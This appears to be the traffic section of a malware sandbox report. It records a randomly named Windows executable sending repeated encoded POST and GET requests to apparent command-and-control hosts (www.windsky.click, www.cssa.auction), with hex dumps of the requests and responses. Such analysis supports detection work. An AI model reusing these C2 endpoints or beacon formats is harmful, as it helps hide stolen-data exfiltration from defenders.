                                                                  Data Raw: 31 30 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 51 31 52 c3 30 10 ec 79 c5 a1 1a 3b b8 a3 88 d2 10 e8 18 52 84 82 f2 22 2f f6 4d 64 99 f1 1d f1 e4 f7 28 09 99 24 1e d4 ed 4a bb da bd 23 3a 9d f9 fd f2 fd 79 fd b9 7a a1 d6 ba b8 b8 a3 33 7f 80 14 39 35 de 21 b9 eb 0b 70 7d 81 47 aa 83 31 85 96 07 85 79 f7 b1 7e 2d 9e dc 7f 4f 12 77 f0 6e 27 18 bf fb c1 1c 85 3e 19 52 96 8c 52 5b eb 6b ec 24 a0 38 82 07 92 24 26 1c 0b 0d 1c e1 ab f2 71 6a 19 25 6d 69 40 f4 4e 6d 1f a1 2d 90 3d db 01 5f 67 a6 0c aa 53 95 89 45 2c de 58 8c 53 00 75 50 e5 06 f3 d9 89 bf d4 9c dd f6 9c 6f fa 7a 3f b1 aa 65 47 21 b2 aa 77 1d cb a1 ca c1 b2 f8 b3 9c 7c 7c 9a 5d b5 58 b7 a0 11 1b 15 03 89 d2 4f aa 31 34 bd a4 86 ae 3c 4a 5a 45 b0 22 4f a8 03 6d 38 6c f3 2a 0c 43 99 63 55 93 14 b3 1c e3 3a f7 6d d0 2c b8 d9 eb 2f b4 74 8c 33 f8 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 10dmQ1R0y;R"/Md($J#:yz395!p}G1y~-Own'>RR[k$8$&qj%mi@Nm-=_gSE,XSuPoz?eG!w||]XO14<JZE"Om8l*CcU:m,/t30


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  22192.168.2.55000646.253.5.221801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:23:02.839405060 CET715OUTPOST /gybb/ HTTP/1.1
                                                                  Host: www.windsky.click
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.windsky.click
                                                                  Content-Length: 226
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.windsky.click/gybb/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Raw: 65 36 73 48 38 3d 73 43 63 55 73 46 35 56 6c 57 68 58 4e 38 4a 58 67 47 55 57 30 56 30 6c 6e 47 39 69 53 4e 2b 70 53 4d 70 36 43 79 4e 74 75 32 72 4a 52 6d 43 7a 42 53 54 30 4c 52 34 48 54 75 4f 6e 58 69 76 55 71 69 64 43 73 57 31 7a 38 4a 34 4b 4a 49 33 55 31 6d 73 65 36 76 6b 4d 62 48 64 57 33 59 61 53 6f 37 58 65 6b 32 39 6d 66 6d 7a 38 55 44 39 6b 4b 57 4e 49 57 42 77 64 38 4b 61 4a 47 6a 6a 7a 79 72 52 33 4f 79 72 41 4f 66 52 61 41 53 77 33 78 64 61 45 43 68 38 43 4b 7a 6c 70 46 2f 36 72 50 44 2f 78 57 6f 71 59 76 70 53 54 71 35 65 59 41 31 73 2f 65 56 55 5a 43 37 57 57 49 77 78 4f 76 69 61 56 68 4d 75 58 5a 4d 48 62 72 4d 39 6f 64 67 54 49 53 73 51 6e 6f 47 4f 53
                                                                  Data Ascii: e6sH8=sCcUsF5VlWhXN8JXgGUW0V0lnG9iSN+pSMp6CyNtu2rJRmCzBST0LR4HTuOnXivUqidCsW1z8J4KJI3U1mse6vkMbHdW3YaSo7Xek29mfmz8UD9kKWNIWBwd8KaJGjjzyrR3OyrAOfRaASw3xdaECh8CKzlpF/6rPD/xWoqYvpSTq5eYA1s/eVUZC7WWIwxOviaVhMuXZMHbrM9odgTISsQnoGOS
                                                                  Jan 11, 2025 01:23:03.649169922 CET774INHTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Sat, 11 Jan 2025 00:23:03 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Content-Language: en
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Referrer-Policy: origin-when-cross-origin
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Expect-CT: enforce; max-age=3600
                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                  Strict-Transport-Security: max-age=63072000
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 31 30 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 51 31 52 c3 30 10 ec 79 c5 a1 1a 3b b8 a3 88 d2 10 e8 18 52 84 82 f2 22 2f f6 4d 64 99 f1 1d f1 e4 f7 28 09 99 24 1e d4 ed 4a bb da bd 23 3a 9d f9 fd f2 fd 79 fd b9 7a a1 d6 ba b8 b8 a3 33 7f 80 14 39 35 de 21 b9 eb 0b 70 7d 81 47 aa 83 31 85 96 07 85 79 f7 b1 7e 2d 9e dc 7f 4f 12 77 f0 6e 27 18 bf fb c1 1c 85 3e 19 52 96 8c 52 5b eb 6b ec 24 a0 38 82 07 92 24 26 1c 0b 0d 1c e1 ab f2 71 6a 19 25 6d 69 40 f4 4e 6d 1f a1 2d 90 3d db 01 5f 67 a6 0c aa 53 95 89 45 2c de 58 8c 53 00 75 50 e5 06 f3 d9 89 bf d4 9c dd f6 9c 6f fa 7a 3f b1 aa 65 47 21 b2 aa 77 1d cb a1 ca c1 b2 f8 b3 9c 7c 7c 9a 5d b5 58 b7 a0 11 1b 15 03 89 d2 4f aa 31 34 bd a4 86 ae 3c 4a 5a 45 b0 22 4f a8 03 6d 38 6c f3 2a 0c 43 99 63 55 93 14 b3 1c e3 3a f7 6d d0 2c b8 d9 eb 2f b4 74 8c 33 f8 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 10dmQ1R0y;R"/Md($J#:yz395!p}G1y~-Own'>RR[k$8$&qj%mi@Nm-=_gSE,XSuPoz?eG!w||]XO14<JZE"Om8l*CcU:m,/t30


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  23192.168.2.55000746.253.5.221801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:23:05.390223026 CET1732OUTPOST /gybb/ HTTP/1.1
                                                                  Host: www.windsky.click
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.windsky.click
                                                                  Content-Length: 1242
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.windsky.click/gybb/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Raw: 65 36 73 48 38 3d 73 43 63 55 73 46 35 56 6c 57 68 58 4e 38 4a 58 67 47 55 57 30 56 30 6c 6e 47 39 69 53 4e 2b 70 53 4d 70 36 43 79 4e 74 75 32 7a 4a 52 31 36 7a 42 79 76 30 49 52 34 48 66 4f 4f 6d 58 69 75 45 71 69 31 65 73 57 4a 46 38 4c 41 4b 49 72 2f 55 2b 30 55 65 74 66 6b 4d 47 58 64 4c 71 49 62 59 6f 37 48 43 6b 79 68 6d 66 6d 7a 38 55 45 46 6b 63 33 4e 49 4e 42 77 43 37 4b 61 2f 51 54 6a 66 79 6f 67 56 4f 79 6d 69 4a 72 64 61 44 7a 41 33 7a 76 79 45 4e 68 38 41 47 54 6c 4c 46 2f 32 6f 50 48 66 58 57 70 66 33 76 72 43 54 70 6f 2b 46 58 45 74 6c 42 6c 63 6c 42 71 4b 61 53 6e 64 4a 6c 7a 69 4e 68 76 62 30 64 66 44 6e 6c 6f 35 75 51 54 57 77 51 49 45 50 6a 57 6e 39 73 76 6e 39 6f 6f 61 46 38 6e 49 50 73 75 6d 31 77 56 41 75 6a 4d 43 36 7a 39 68 31 33 49 56 52 48 68 78 68 51 36 69 55 47 61 74 46 73 66 55 47 50 53 5a 56 4f 36 4f 79 41 69 36 66 43 77 76 4f 71 66 4a 73 31 6d 62 4a 6a 32 67 59 62 4e 53 45 33 4d 64 6a 58 56 49 49 74 6a 70 31 71 78 71 59 75 43 48 37 4b 4b 73 32 71 46 35 57 4a 6f 61 56 [TRUNCATED]
                                                                  Data Ascii: e6sH8=sCcUsF5VlWhXN8JXgGUW0V0lnG9iSN+pSMp6CyNtu2zJR16zByv0IR4HfOOmXiuEqi1esWJF8LAKIr/U+0UetfkMGXdLqIbYo7HCkyhmfmz8UEFkc3NINBwC7Ka/QTjfyogVOymiJrdaDzA3zvyENh8AGTlLF/2oPHfXWpf3vrCTpo+FXEtlBlclBqKaSndJlziNhvb0dfDnlo5uQTWwQIEPjWn9svn9ooaF8nIPsum1wVAujMC6z9h13IVRHhxhQ6iUGatFsfUGPSZVO6OyAi6fCwvOqfJs1mbJj2gYbNSE3MdjXVIItjp1qxqYuCH7KKs2qF5WJoaVp0ST+QHFuNP537UZR2sQaaLdAPCkvf5wFTeme1MJvIv6C6sFC9laPIxRzRz6JK9RnXs3GULKE4FojUIUDprBc3OSiXyuDmnKkROFtEpNuNccJ9Jr8y0y4+qJqBEmp4NWZV3LjQln3kNxLHp0srBD9QIcDLytwXLKr3DqsCDDu4y/+OFQheBQdPbQcflKlA+GcRMq7zUw2LAVySqX+hpfSy9XxuhL2Huf+apq37AIx+WXQLitXu/dSbZsQqwlFnpU8/W05iKNNkb454iIFGFmp2LyqIF6Yn0CEJGTeiA2TGvWOLBJ70o2rnJ1ZDzYn3XSJm89KHjoiBB7rguZgSkPEn0jCRkRbF4Sckm50hxfjcN0jn32XDaIaf0ufYQ5amALcX7uUhKXvuNHQInauJLbkDqVGRovwu3D8GW51PmBhhKruIS7cdH2WQrKzn3x8gKY0593GIcZPeePrSo7iwKfhw+kIG7nieqWR7OyN91CecUCn+F5HTzc/tuFub/CfvGk2p6J4o31dsjnKA58feBwsztzUFh+jsgm+iBguS9BJjhNQayIauRSpl3xGQ6k5DUPeofDP4AJnm5p0/zAY34LFyRhf+qo4l2QwxnBT4S+Ra5LOU0GfN2qFrDtrNjQ8lcbtD5gd10jGKBL9Q9jV6rleVcrZyGYfdyu13 [TRUNCATED]
                                                                  Jan 11, 2025 01:23:06.191010952 CET774INHTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Sat, 11 Jan 2025 00:23:06 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Content-Language: en
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Referrer-Policy: origin-when-cross-origin
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Expect-CT: enforce; max-age=3600
                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                  Strict-Transport-Security: max-age=63072000
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 31 30 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 51 31 52 c3 30 10 ec 79 c5 a1 1a 3b b8 a3 88 d2 10 e8 18 52 84 82 f2 22 2f f6 4d 64 99 f1 1d f1 e4 f7 28 09 99 24 1e d4 ed 4a bb da bd 23 3a 9d f9 fd f2 fd 79 fd b9 7a a1 d6 ba b8 b8 a3 33 7f 80 14 39 35 de 21 b9 eb 0b 70 7d 81 47 aa 83 31 85 96 07 85 79 f7 b1 7e 2d 9e dc 7f 4f 12 77 f0 6e 27 18 bf fb c1 1c 85 3e 19 52 96 8c 52 5b eb 6b ec 24 a0 38 82 07 92 24 26 1c 0b 0d 1c e1 ab f2 71 6a 19 25 6d 69 40 f4 4e 6d 1f a1 2d 90 3d db 01 5f 67 a6 0c aa 53 95 89 45 2c de 58 8c 53 00 75 50 e5 06 f3 d9 89 bf d4 9c dd f6 9c 6f fa 7a 3f b1 aa 65 47 21 b2 aa 77 1d cb a1 ca c1 b2 f8 b3 9c 7c 7c 9a 5d b5 58 b7 a0 11 1b 15 03 89 d2 4f aa 31 34 bd a4 86 ae 3c 4a 5a 45 b0 22 4f a8 03 6d 38 6c f3 2a 0c 43 99 63 55 93 14 b3 1c e3 3a f7 6d d0 2c b8 d9 eb 2f b4 74 8c 33 f8 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 10dmQ1R0y;R"/Md($J#:yz395!p}G1y~-Own'>RR[k$8$&qj%mi@Nm-=_gSE,XSuPoz?eG!w||]XO14<JZE"Om8l*CcU:m,/t30


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  24192.168.2.55000846.253.5.221801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:23:07.933021069 CET434OUTGET /gybb/?rr=BbldmNsp8&e6sH8=hA00v1ZIgX8EW+F3rWYc/zQviV8zTY6oC8gLC3V041/hGU+ZZxjILTR8UNm+bxrYgj9XtAZ4lfteOYOwyHEO4IQcXwxluILOpqvLxjlac2zTW2ZjXnd6ITs8lfiKZkyKwA== HTTP/1.1
                                                                  Host: www.windsky.click
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:23:08.749007940 CET985INHTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Sat, 11 Jan 2025 00:23:08 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Content-Language: en
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Referrer-Policy: origin-when-cross-origin
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Expect-CT: enforce; max-age=3600
                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                  Strict-Transport-Security: max-age=63072000
                                                                  Data Raw: 31 66 38 0d 0a 20 20 20 20 20 20 20 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 69 74 61 6e 63 65 20 6d 65 73 73 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 [TRUNCATED]
                                                                  Data Ascii: 1f8 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="styles.css"> <title>Maitance message</title> </head> <body> <div class="maintenance-message"> <h1>The website is undergoing maintenance. Please come back later.</h1> </div> </body> </html> 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  25192.168.2.550009107.167.84.42801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:23:14.262600899 CET692OUTPOST /rjvg/ HTTP/1.1
                                                                  Host: www.cssa.auction
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.cssa.auction
                                                                  Content-Length: 206
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.cssa.auction/rjvg/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Raw: 65 36 73 48 38 3d 67 57 67 30 68 64 7a 66 77 55 4e 57 45 36 31 67 48 44 35 33 64 49 74 4a 48 4e 61 45 43 37 76 6c 35 74 78 4d 6e 68 31 79 74 4e 39 56 42 75 68 54 6c 39 47 7a 55 43 59 33 4e 58 6f 33 2b 39 36 68 4f 51 38 6e 32 71 58 76 31 68 30 6c 30 72 41 78 56 30 34 4a 43 44 61 4a 6f 31 6c 2f 33 53 71 58 49 48 66 70 77 64 45 2b 54 2f 4f 74 78 62 74 53 7a 34 71 33 67 6c 51 32 6a 6e 72 4d 38 64 4f 72 58 32 77 43 37 4b 39 4a 4a 63 74 58 72 68 47 39 48 4f 35 66 35 5a 43 67 6c 4a 62 45 51 69 39 44 54 43 6a 58 34 70 47 6a 41 68 54 68 46 65 5a 77 68 33 4b 65 49 52 35 31 34 75 34 56 71 63 4b 6c 47 56 56 52 6e 77 4d 3d
                                                                  Data Ascii: e6sH8=gWg0hdzfwUNWE61gHD53dItJHNaEC7vl5txMnh1ytN9VBuhTl9GzUCY3NXo3+96hOQ8n2qXv1h0l0rAxV04JCDaJo1l/3SqXIHfpwdE+T/OtxbtSz4q3glQ2jnrM8dOrX2wC7K9JJctXrhG9HO5f5ZCglJbEQi9DTCjX4pGjAhThFeZwh3KeIR514u4VqcKlGVVRnwM=
                                                                  Jan 11, 2025 01:23:14.813241005 CET992INHTTP/1.1 301 Moved Permanently
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 795
                                                                  date: Sat, 11 Jan 2025 00:23:14 GMT
                                                                  server: LiteSpeed
                                                                  location: https://www.cssa.auction/rjvg/
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  26192.168.2.550010107.167.84.42801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:23:16.812992096 CET712OUTPOST /rjvg/ HTTP/1.1
                                                                  Host: www.cssa.auction
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.cssa.auction
                                                                  Content-Length: 226
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.cssa.auction/rjvg/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Raw: 65 36 73 48 38 3d 67 57 67 30 68 64 7a 66 77 55 4e 57 46 62 46 67 55 77 68 33 61 6f 74 4f 62 64 61 45 62 72 75 75 35 74 39 4d 6e 67 78 69 73 2f 5a 56 47 4d 70 54 33 50 75 7a 58 43 59 33 46 33 6f 79 36 39 36 6d 4f 51 78 53 32 76 33 76 31 67 51 6c 30 75 45 78 56 48 51 4b 44 54 61 4c 6e 56 6c 39 34 79 71 58 49 48 66 70 77 63 6b 51 54 2f 57 74 32 76 70 53 78 5a 71 34 6d 56 51 35 7a 33 72 4d 34 64 4f 56 58 32 77 38 37 49 4a 76 4a 66 56 58 72 6b 69 39 48 61 74 63 77 5a 43 69 71 70 61 39 52 43 67 55 4c 69 72 74 39 37 62 53 41 58 48 65 4e 49 6f 61 37 56 43 32 62 78 56 4e 6f 39 77 69 37 73 72 4d 63 32 46 68 35 6e 62 41 62 36 38 4d 63 34 65 69 4c 4c 32 46 42 38 59 6f 6a 6d 39 34
                                                                  Data Ascii: e6sH8=gWg0hdzfwUNWFbFgUwh3aotObdaEbruu5t9Mngxis/ZVGMpT3PuzXCY3F3oy696mOQxS2v3v1gQl0uExVHQKDTaLnVl94yqXIHfpwckQT/Wt2vpSxZq4mVQ5z3rM4dOVX2w87IJvJfVXrki9HatcwZCiqpa9RCgULirt97bSAXHeNIoa7VC2bxVNo9wi7srMc2Fh5nbAb68Mc4eiLL2FB8Yojm94
                                                                  Jan 11, 2025 01:23:17.364053965 CET992INHTTP/1.1 301 Moved Permanently
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 795
                                                                  date: Sat, 11 Jan 2025 00:23:17 GMT
                                                                  server: LiteSpeed
                                                                  location: https://www.cssa.auction/rjvg/
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  27192.168.2.550011107.167.84.42801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:23:19.357899904 CET1729OUTPOST /rjvg/ HTTP/1.1
                                                                  Host: www.cssa.auction
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.cssa.auction
                                                                  Content-Length: 1242
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.cssa.auction/rjvg/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Raw: 65 36 73 48 38 3d 67 57 67 30 68 64 7a 66 77 55 4e 57 46 62 46 67 55 77 68 33 61 6f 74 4f 62 64 61 45 62 72 75 75 35 74 39 4d 6e 67 78 69 73 2f 52 56 42 35 39 54 6d 59 61 7a 57 43 59 33 45 33 6f 7a 36 39 37 6a 4f 51 70 57 32 76 79 55 31 6a 34 6c 32 4d 4d 78 65 57 51 4b 4b 54 61 4c 69 6c 6c 38 33 53 72 4e 49 48 50 74 77 63 55 51 54 2f 57 74 32 70 46 53 32 49 71 34 6b 56 51 32 6a 6e 72 59 38 64 50 34 58 32 59 4b 37 4c 6c 5a 4a 76 31 58 72 45 79 39 45 76 35 63 79 35 43 61 70 70 61 4d 52 43 74 54 4c 69 6d 57 39 36 2f 30 41 51 7a 65 64 4e 5a 6b 67 31 4b 73 49 44 63 68 6b 75 34 56 36 63 76 55 43 6b 39 6b 36 56 76 4e 58 70 67 6b 66 63 53 54 4e 71 2f 43 62 36 35 35 74 6e 38 48 2b 75 62 33 31 53 31 2b 47 58 51 68 6e 76 6f 56 33 79 67 4b 44 57 62 75 77 4f 4d 64 78 68 71 39 44 41 66 51 45 6f 4d 6a 7a 4f 63 6a 74 46 46 4e 4d 43 4c 6a 31 4b 34 66 68 47 33 4c 49 32 67 38 38 59 6d 69 32 76 6a 75 70 47 52 53 6e 6e 70 6f 45 65 49 68 2f 71 33 31 72 31 4c 74 64 4c 74 33 65 62 4d 67 4d 32 6d 51 48 61 2b 79 65 34 46 43 [TRUNCATED]
